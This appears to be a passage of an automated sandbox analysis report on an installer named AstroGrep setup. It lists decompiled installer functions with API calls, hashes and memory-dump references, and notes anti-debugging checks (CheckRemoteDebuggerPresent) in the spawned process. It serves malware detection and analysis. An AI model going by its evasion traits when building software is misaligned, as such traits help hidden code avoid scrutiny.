                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402A7A, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E00402A7A(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x42e4b0 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A7A(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E004060C8(3);
					if(_t27 == 0) {
						if( *0x42e4b0 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42e4b0, 0);
				}
				return _t18;
			}








                                                                                                            0x00402a9b
                                                                                                            0x00402aa3
                                                                                                            0x00402acb
                                                                                                            0x00402ab5
                                                                                                            0x00402b05
                                                                                                            0x00402b0b
                                                                                                            0x00000000
                                                                                                            0x00402b0d
                                                                                                            0x00402ac9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402ac9
                                                                                                            0x00402ae0
                                                                                                            0x00402ae8
                                                                                                            0x00402aef
                                                                                                            0x00402b1b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402b23
                                                                                                            0x00402b2b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402b2b
                                                                                                            0x00000000
                                                                                                            0x00402afe
                                                                                                            0x00402b12

                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1912718029-0
                                                                                                            • Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                                            • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                                                                            • Opcode Fuzzy Hash: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                                            • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x58);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A3A(_t21), _t21,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                            0x00401ce8
                                                                                                            0x00401cef
                                                                                                            0x00401d1e
                                                                                                            0x00401d26
                                                                                                            0x00401d2d
                                                                                                            0x00401d2d
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 00401CE2
                                                                                                            • GetClientRect.USER32 ref: 00401CEF
                                                                                                            • LoadImageA.USER32 ref: 00401D10
                                                                                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: 763b4bf58b938fb9abbbbf1fb7f74f3e5dbcbbd1c05f8ded2862ff9186105390
                                                                                                            • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                                                                            • Opcode Fuzzy Hash: 763b4bf58b938fb9abbbbf1fb7f74f3e5dbcbbd1c05f8ded2862ff9186105390
                                                                                                            • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004057A1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004057A1(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409014);
				}
				return _t7;
			}




                                                                                                            0x004057a2
                                                                                                            0x004057b9
                                                                                                            0x004057c1
                                                                                                            0x004057c1
                                                                                                            0x004057c9

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
                                                                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
                                                                                                            • lstrcatA.KERNEL32(?,00409014), ref: 004057C1
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 2659869361-3916508600
                                                                                                            • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                            • Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
                                                                                                            • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                            • Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040583A, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0040583A(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E004057CC(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}









                                                                                                            0x00405843
                                                                                                            0x0040584a
                                                                                                            0x0040584d
                                                                                                            0x0040584f
                                                                                                            0x00405853
                                                                                                            0x00405868
                                                                                                            0x00405887
                                                                                                            0x00000000
                                                                                                            0x0040586f
                                                                                                            0x00405871
                                                                                                            0x00405872
                                                                                                            0x00405875
                                                                                                            0x00405876
                                                                                                            0x0040587e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405880
                                                                                                            0x00405883
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405883
                                                                                                            0x00000000
                                                                                                            0x00405872
                                                                                                            0x00405860
                                                                                                            0x00000000
                                                                                                            0x00405861

                                                                                                            APIs
                                                                                                            • CharNextA.USER32(?,?,C:\,?,004058A6,C:\,C:\,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                            • CharNextA.USER32(00000000), ref: 0040584D
                                                                                                            • CharNextA.USER32(00000000), ref: 00405861
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CharNext
                                                                                                            • String ID: C:\
                                                                                                            • API String ID: 3213498283-3404278061
                                                                                                            • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                                                            • Instruction ID: 19ae957cdd7e66f1aaea138ca2c8f088f7fbe10d55ad18dca4d2112a8e91772d
                                                                                                            • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                                                            • Instruction Fuzzy Hash: 7FF0C253904F506EFB3272640C44B775B98CB55390F18C47BED90A62C1827C4C604F9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402C02, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00402C02(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420420; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42e40c;
						if(_t2 >  *0x42e40c) {
							_t3 = CreateDialogParamA( *0x42e400, 0x6f, 0, E00402B7F, 0);
							 *0x420420 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406104(0);
					}
				} else {
					_t6 =  *0x420420; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420420 = 0;
					return _t6;
				}
			}






                                                                                                            0x00402c09
                                                                                                            0x00402c23
                                                                                                            0x00402c29
                                                                                                            0x00402c33
                                                                                                            0x00402c39
                                                                                                            0x00402c3f
                                                                                                            0x00402c50
                                                                                                            0x00402c59
                                                                                                            0x00000000
                                                                                                            0x00402c5e
                                                                                                            0x00402c65
                                                                                                            0x00402c2b
                                                                                                            0x00402c32
                                                                                                            0x00402c32
                                                                                                            0x00402c0b
                                                                                                            0x00402c0b
                                                                                                            0x00402c12
                                                                                                            0x00402c15
                                                                                                            0x00402c15
                                                                                                            0x00402c1b
                                                                                                            0x00402c22
                                                                                                            0x00402c22

                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                                                                            • GetTickCount.KERNEL32 ref: 00402C33
                                                                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 2102729457-0
                                                                                                            • Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                                                            • Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
                                                                                                            • Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                                                            • Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004054C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004054C0(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42b070->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42b070,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                            0x004054c9
                                                                                                            0x004054e9
                                                                                                            0x004054f1
                                                                                                            0x004054f6
                                                                                                            0x00000000
                                                                                                            0x004054fc
                                                                                                            0x00405500

                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                                            • CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 004054D3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                                                            • Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
                                                                                                            • Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                                                            • Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004057E8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004057E8(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                            0x004057e9
                                                                                                            0x004057f3
                                                                                                            0x004057f5
                                                                                                            0x004057fc
                                                                                                            0x00405804
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405804
                                                                                                            0x00405806
                                                                                                            0x0040580b

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Local\Temp,00402CD2,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,80000000,00000003), ref: 004057EE
                                                                                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Local\Temp,00402CD2,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,80000000,00000003), ref: 004057FC
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 004057E8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                            • API String ID: 2709904686-501415292
                                                                                                            • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                                            • Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
                                                                                                            • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                                            • Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405907, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00405907(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                                            0x00405917
                                                                                                            0x00405919
                                                                                                            0x0040591c
                                                                                                            0x00405948
                                                                                                            0x00405921
                                                                                                            0x0040592a
                                                                                                            0x0040592f
                                                                                                            0x0040593a
                                                                                                            0x0040593d
                                                                                                            0x00405959
                                                                                                            0x0040593f
                                                                                                            0x00405946
                                                                                                            0x00000000
                                                                                                            0x00405946
                                                                                                            0x00405952
                                                                                                            0x00405956
                                                                                                            0x00405956
                                                                                                            0x00405950
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040592F
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                            • Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
                                                                                                            • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                            • Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Analysis Process: astro-grep.exe PID: 748 Parent PID: 528 astro-grep.exeCOMMON

                                                                                                            Executed Functions

                                                                                                            Function 00EA2458, Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(?), ref: 00EA4E6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.461546770.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: 25d8447044cd77f35417334db38c4a99f9d65c47c68452e2d4a0053a07dbfb71
                                                                                                            • Instruction ID: 8bc17ce5c43fb72d9977714ebad01e72f971d2af6289364e3c43590a6a1b3138
                                                                                                            • Opcode Fuzzy Hash: 25d8447044cd77f35417334db38c4a99f9d65c47c68452e2d4a0053a07dbfb71
                                                                                                            • Instruction Fuzzy Hash: BE4146B0E006588FDB10CFA9C985B9EBBF1FB89314F109529E814BB384D7B4A845CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00EA4D7C, Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(?), ref: 00EA4E6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.461546770.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: 597cc9a878d4c97dc0010b5cedd05b6f08e185aae1fb7044b01426cd17ea51ba
                                                                                                            • Instruction ID: 93bf23d7a0bcd2a3830e44837ddeb3390aabd88ca869b7d64ed12b2a77a84e2c
                                                                                                            • Opcode Fuzzy Hash: 597cc9a878d4c97dc0010b5cedd05b6f08e185aae1fb7044b01426cd17ea51ba
                                                                                                            • Instruction Fuzzy Hash: 184127B0D006589FDB10CFA9C985B9EBBF1FB89314F149529E814BB384D7B4A845CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00EAD5D0, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 00EAD64F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.461546770.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                            • String ID:
                                                                                                            • API String ID: 3662101638-0
                                                                                                            • Opcode ID: 111fdc594f082870b19cdf998024ed4fef98bc04fb03a16bcce68a5b9c2df520
                                                                                                            • Instruction ID: 1fd9667ee53c0f9bb3391c112b7a05a7ba8b700f8ffd6b150a0fedfd952802be
                                                                                                            • Opcode Fuzzy Hash: 111fdc594f082870b19cdf998024ed4fef98bc04fb03a16bcce68a5b9c2df520
                                                                                                            • Instruction Fuzzy Hash: BA2169718002198FCB10CFA9C984BEEBBF4AF89324F15846AD459B7740D778A945CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00EABC64, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 00EAD64F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.461546770.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                            • String ID:
                                                                                                            • API String ID: 3662101638-0
                                                                                                            • Opcode ID: c434eb9fa349006888ed562a85f449733a2257c28efead86dddf2e39b352c4d2
                                                                                                            • Instruction ID: 165d2bb237169a92c6b37a7e4a6e9d621363188803885551607b29448598afef
                                                                                                            • Opcode Fuzzy Hash: c434eb9fa349006888ed562a85f449733a2257c28efead86dddf2e39b352c4d2
                                                                                                            • Instruction Fuzzy Hash: A62148B19042198FCB00CF99D984BEEBBF4EF49324F15846AE459B7740D778A944CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

